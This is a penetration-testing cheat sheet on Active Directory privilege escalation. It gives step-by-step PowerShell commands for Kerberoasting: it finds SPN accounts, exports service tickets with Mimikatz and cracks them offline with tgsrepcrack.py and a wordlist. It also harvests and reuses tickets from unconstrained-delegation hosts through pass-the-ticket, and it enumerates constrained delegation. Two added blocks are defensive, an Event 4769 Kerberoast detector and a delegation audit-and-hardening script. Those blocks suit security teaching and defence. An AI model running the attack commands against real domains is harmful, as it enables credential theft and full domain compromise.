Domain Privilege Escalation

Domain Privilege Escalation: Kerberoast

Find service accounts (users with an SPN set):

GetUserSPNs

https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1

Powerview:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetUser -SPN

Active directory Module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Import-ActiveDirectory.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

If you get the error "You cannot call a method on a null-valued expression", use the command below to work around it:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master\ActiveDirectory> Install-Module Pester -Force -Verbose -SkipPublisherCheck

PS C:\Users\victim6\Downloads\scripts-master\scripts-master> $client -eq $null

https://github.com/brianary/scripts

PS C:\Users\victim6\Downloads\scripts-master\scripts-master> Import-Module .\Install-ActiveDirectoryModule.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> help .\Install-ActiveDirectoryModule.ps1 -Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Install-ActiveDirectoryModule -dllpath C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.dll -admodulepath C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Add-Type -AssemblyName system.IdentityModel

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> New-Object System.IdentityModel.Tokens.KerberosReceiverSecurityToken -ArgumentList "WIN-2RUMVG5JPOC.security.local"

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> klist

Export all tickets using mimikatz:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Import-Module .\Invoke-Mimikatz.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"kerberos::list /export"'

Crack the service account password:

PS C:\Program Files (x86)\Python37-32> .\python.exe C:\Users\victim6\Downloads\new\new\tool\tool\kerberoast-master\kerberoast-master\tgsrepcrack.py C:\Users\victim6\Downloads\new\new\tool\tool\kerberoast-master\kerberoast-master\10k-worst-passwords.txt '2-40a50000-Administrator@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi'
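Detection for the Kerberoast workflow above, as an added example that is not part of the original notes: it reads the domain controller's Security log for the RC4-encrypted service-ticket requests that tgsrepcrack.py depends on and flags accounts that requested tickets for many different service accounts. The computer name, time window and threshold are assumptions.

```powershell
# Added example, not part of the original notes: spot Kerberoasting in the DC Security log.
# tgsrepcrack.py above only cracks RC4-HMAC service tickets, so the usable signal is a
# burst of successful TGS requests (Event ID 4769) with TicketEncryptionType 0x17 from one
# account against many different service accounts in a short window.
# Assumptions: "Audit Kerberos Service Ticket Operations" is enabled on the DC; the window
# and threshold are illustrative defaults, not values from the page.
param(
    [string]$ComputerName = $env:COMPUTERNAME,
    [int]$Hours = 24,
    [int]$Threshold = 5     # distinct SPN owners requested by one account
)

$windowMs = $Hours * 3600 * 1000
$xpath = "*[System[EventID=4769 and TimeCreated[timediff(@SystemTime) <= $windowMs]] " +
         "and EventData[Data[@Name='TicketEncryptionType']='0x17'] " +
         "and EventData[Data[@Name='Status']='0x0']]"

$events = Get-WinEvent -ComputerName $ComputerName -LogName Security -FilterXPath $xpath `
                       -ErrorAction SilentlyContinue

$rows = foreach ($e in $events) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        Time      = $e.TimeCreated
        Requester = $d['TargetUserName']   # account that requested the ticket
        Service   = $d['ServiceName']      # SPN owner, e.g. the service account
        ClientIP  = $d['IpAddress']
    }
}

# Machine accounts and krbtgt are not what a Kerberoaster (or tgsrepcrack) targets.
$suspects = $rows |
    Where-Object { $_.Service -notlike '*$' -and $_.Service -ne 'krbtgt' } |
    Group-Object Requester |
    ForEach-Object {
        $spns = @($_.Group.Service | Sort-Object -Unique)
        if ($spns.Count -ge $Threshold) {
            [pscustomobject]@{
                Requester    = $_.Name
                DistinctSPNs = $spns.Count
                Sources      = (@($_.Group.ClientIP | Sort-Object -Unique)) -join ','
                FirstSeen    = ($_.Group.Time | Measure-Object -Minimum).Minimum
                LastSeen     = ($_.Group.Time | Measure-Object -Maximum).Maximum
            }
        }
    }
$suspects | Format-Table -AutoSize
```

Event 4769 records the encryption type the DC actually used, which for a user-based SPN is RC4 unless the account's msDS-SupportedEncryptionTypes enables AES; the lasting fix is AES-only service accounts with long random passwords or gMSAs, which makes the crack step above infeasible.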

Unconstrained delegation:

Discover domain computers that have unconstrained delegation enabled using PowerView:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> import-module .\powerview.psm1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -Unconstrained

Using the Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADComputer -Filter {TrustedForDelegation -eq $True}

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -filter {TrustedForDelegation -eq $True}

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

The ticket can be reused:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"kerberos::ptt [0;1b6e65]-0-0-40a50000-Administrator@ldap-WIN-2RUMVG5JPOC.security.local.kirbi"'

Constrained Delegation:

Using PowerView (dev):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-Domainuser -TrustedToAuth

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-DomainComputer -TrustedToAuth

Using Active Directory Module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

If the PowerView commands are not found, dot-source the dev version first and try again:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> . .\powerview_dev.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-Domainuser -TrustedToAuth

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-DomainComputer -TrustedToAuth
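An audit-and-harden counterpart to the unconstrained and constrained delegation checks above, as an added example that is not part of the original notes: it enumerates the same delegation attributes with the Active Directory module, rates each finding, and with -Remediate applies the standard mitigations. The -Remediate switch, the Domain Admins scope and the use of the Protected Users group are assumptions, not the page's own procedure.

```powershell
# Added example, not part of the original notes: audit the delegation settings that the
# PowerView / AD-module queries above enumerate, and optionally harden what they find.
# Assumptions: run with RSAT as a domain admin; -Remediate is off by default, and using
# 'Protected Users' for Domain Admins is an illustrative policy choice, not the page's.
param([switch]$Remediate)
Import-Module ActiveDirectory

$props = 'TrustedForDelegation', 'TrustedToAuthForDelegation', 'msDS-AllowedToDelegateTo'
$dcDNs = (Get-ADDomainController -Filter *).ComputerObjectDN   # DCs are unconstrained by design
$findings = @()

# Unconstrained: a non-DC with TrustedForDelegation caches the TGT of every user who
# connects to it (what "sekurlsa::tickets /export" harvests), so it is always High.
$unc = @(Get-ADUser -Filter 'TrustedForDelegation -eq $true' -Properties $props) +
       @(Get-ADComputer -Filter 'TrustedForDelegation -eq $true' -Properties $props)
foreach ($o in ($unc | Where-Object { $_.DistinguishedName -notin $dcDNs })) {
    $findings += [pscustomobject]@{ Object = $o.SamAccountName; DN = $o.DistinguishedName
        Type = 'Unconstrained'; Risk = 'High'; Detail = 'TrustedForDelegation' }
}

# Constrained: scoped to msDS-AllowedToDelegateTo, but with protocol transition
# (TrustedToAuthForDelegation) the account can impersonate any user to those services.
$con = @(Get-ADUser -LDAPFilter '(msDS-AllowedToDelegateTo=*)' -Properties $props) +
       @(Get-ADComputer -LDAPFilter '(msDS-AllowedToDelegateTo=*)' -Properties $props)
foreach ($o in $con) {
    $risk = if ($o.TrustedToAuthForDelegation) { 'High' } else { 'Medium' }
    $findings += [pscustomobject]@{ Object = $o.SamAccountName; DN = $o.DistinguishedName
        Type = 'Constrained'; Risk = $risk; Detail = ($o.'msDS-AllowedToDelegateTo' -join ';') }
}
$findings | Sort-Object Risk, Type | Format-Table Object, Type, Risk, Detail -AutoSize

# Tier-0 accounts should never be delegable: set "sensitive and cannot be delegated" and
# add them to Protected Users so a harvested ticket cannot be reused through delegation.
$admins = Get-ADGroupMember 'Domain Admins' -Recursive | Where-Object objectClass -eq 'user' |
          Get-ADUser -Properties AccountNotDelegated | Where-Object { -not $_.AccountNotDelegated }
foreach ($a in $admins) {
    Write-Warning "Domain Admin $($a.SamAccountName) is still delegable"
    if ($Remediate) {
        Set-ADAccountControl -Identity $a -AccountNotDelegated $true
        Add-ADGroupMember -Identity 'Protected Users' -Members $a
    }
}
if ($Remediate) {
    # Strip unconstrained delegation from non-DCs; services that truly need it should be
    # moved to constrained delegation with a minimal msDS-AllowedToDelegateTo list.
    foreach ($f in ($findings | Where-Object Type -eq 'Unconstrained')) {
        Set-ADAccountControl -Identity $f.DN -TrustedForDelegation $false
    }
}
```

Protected Users membership also disables NTLM, RC4 and DES for those accounts, so run the script without -Remediate first and confirm the listed admins do not depend on them.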

@Saksham Dixit